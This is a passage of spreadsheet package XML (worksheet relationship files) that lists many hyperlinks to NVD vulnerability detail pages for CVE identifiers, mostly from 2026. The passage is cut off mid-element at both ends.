TargetMode="External" Id="rId3424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId3425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId3426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId3427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId3428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId3429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId3430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId3431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId3432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId3433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId3434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId3435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId3436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId3437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId3438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId3439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId3440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId3441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId3442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId3443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId3444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId3445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId3446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId3447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId3448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId3449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId3450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId3451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId3452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId3453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId3454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId3455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId3456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId3457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId3458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId3459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId3460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId3461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId3462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId3463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId3464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId3465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId3466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId3467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId3468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId3469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId3470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId3471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId3472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId3473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId3474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId3475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId3476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId3477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId3478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId3479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId3480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId3481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71324" TargetMode="External" Id="rId3482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId3483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId3484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId3485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId3486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId3487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId3488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72718" TargetMode="External" Id="rId3489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId3490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId3491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId3492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId3493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId3494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId3495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId3496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73033" TargetMode="External" Id="rId3497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74038" TargetMode="External" Id="rId3498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74044" TargetMode="External" Id="rId3499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74236" TargetMode="External" Id="rId3500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74796" TargetMode="External" Id="rId3501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId3502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId3503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId3504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId3505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId3506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId3507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId3508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79636" TargetMode="External" Id="rId3509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId3510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId3511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId3512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId3513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82079" TargetMode="External" Id="rId3514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId3515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId3516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId3517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85594" TargetMode="External" Id="rId3518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId3519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86419" TargetMode="External" Id="rId3520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86749" TargetMode="External" Id="rId3521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87088" TargetMode="External" Id="rId3522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87825" TargetMode="External" Id="rId3523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87877" TargetMode="External" Id="rId3524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88004" TargetMode="External" Id="rId3525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88008" TargetMode="External" Id="rId3526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88924" TargetMode="External" Id="rId3527" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-41352" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-7255" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-37969" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-38352" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31431" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42043" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47691" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54745" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65956" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70352" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73299" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79696" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80098" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83711" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47686" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52855" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54680" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55565" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65818" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72736" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72862" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72863" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72864" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72865" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72867" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72868" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72869" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72876" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72901" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72902" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73263" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79748" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13447" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18221" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18658" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26035" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28780" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37003" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40860" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41871" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42027" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45018" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47698" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47884" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52490" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52924" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53002" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53006" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54569" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55546" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55559" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56207" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 